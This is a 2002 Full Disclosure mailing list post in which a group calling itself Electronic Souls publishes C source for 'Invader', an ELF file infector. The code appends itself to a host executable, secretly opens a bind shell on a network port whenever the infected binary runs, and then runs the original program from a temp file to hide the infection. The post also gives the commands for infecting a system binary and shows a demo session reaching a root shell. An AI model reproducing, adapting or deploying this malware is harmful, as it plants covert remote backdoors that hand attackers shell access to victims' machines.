Full Disclosure mailing list archives
[ElectronicSouls] ELF warfare
From: es () hush com
Date: Fri, 29 Nov 2002 01:53:38 -0800
-----BEGIN PGP SIGNED MESSAGE----- Pioneered by silvio, perfected by Electronic Souls... /* ----------------------------------------------------------- [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW] ------------------- DO NOT DISTRIBUTE ! ------------------- ----------------------------------------------------------- [ E l e c t r o n i c S o u l s ] [Invader] - append ELF infect0r - update of the underworld ELF Parasite (C) BrainStorm - 01-2002 ----------------------------------------------------------- Information : +++++++++++++ This ELF Infector uses the appendage infection tekneeq! that means to two Executeables are appended together. The payload inside this parasite opens a port shell on the infected machine as the user who executed it. ----------------------------------------------------------- to get it working : +++++++++++++++++++ compile the code, then get the file size and change the define in the code, now recompile and we are done ;) example : i wrote a quick program that just prints a msg and shows the date so i can test the infection: [root@BrainMachine x]# ./blah im a test prog that gets infected :> Sam Jan 5 14:22:43 CET 2002 [root@BrainMachine x]# thats how it looks like before the infection and after it, since the parasite extracts the host to a temp file and executes it, so you wont notice the infection unless you added some printf()s from another term: [root@BrainMachine client]# telnet localhost 21317 Trying 127.0.0.1... Connected to brainmachine.electronicsouls.org. Escape character is '^]'. uname -a; Linux BrainMachine.ElectronicSouls.org 2.2.17-14 #1 Wed Feb 14 13:51:00 CET 2001 i686 unknown : command not found id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) : command not found ..now ph34r this ;) ----------------------------------------------------------- to infect a binary : ++++++++++++++++++++ cat /bin/binary >> para: mv para /bin/binary if binary gets executed it opens up a portshell ;) ----------------------------------------------------------- special thanks to : +++++++++++++++++++ ghQst and SectorX for making me interested in ELF infection and for beeing there for me since back in the days =) ! and PhaNtoM for providing me with that very small portshell code ! shouts go out to all ElectronicSouls members - j00 r0ck =) ----------------------------------------------------------- [ElectronicSouls] - Immortal Blackhat since 1995 ;) ----------------------------------------------------------- */ /* the fearsome t e k n e e q z start here ! */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/socket.h> #include <netinet/in.h> #define PARASIZE 18018 /* dont forget to change me ! */ #define TEMP ".para.tmp" /* tmp file */ #define KILL(X) exit(1) /* we dont want to die.. */ int soc,cli; struct sockaddr_in serv_addr; int main(int argc, char *argv[], char *envp[]) { int input, output, lenght; char *dope; struct stat stat; if(fork()==0) /* start of the portshell */ { serv_addr.sin_family=2; serv_addr.sin_addr.s_addr=0; serv_addr.sin_port=(0x4553); soc=socket(2,1,6); bind(soc,(struct sockaddr *)&serv_addr,0x10); listen(soc,1); cli=accept(soc,0,0); dup2(cli,0); dup2(cli,1); dup2(cli,2); execl("/bin/sh","sh",0); } input = open("/proc/self/exe", O_RDONLY); if (input < 0) KILL("open(input)"); if (fstat(input, &stat) < 0) KILL("fstat"); lenght = stat.st_size - PARASIZE; dope = malloc(lenght); if (dope == NULL) KILL("malloc"); if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)"); if (read(input, dope, lenght) != lenght) KILL("read(input)"); close(input); output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode); if (output < 0) KILL("open(output)"); if (write(output, dope, lenght) != lenght) KILL("write(output)"); free(dope); close(output); exit(execve(TEMP, argv, envp)); } The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Healthy, wealthy, and wise." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nO18MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltkLoAoJgfB4HOklr/ Ezj3HsyHG0OtsGcIAKCgY/ggjGC+mD820NIEF92UMLfgLg== =ooII -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] ELF warfare es (Nov 29)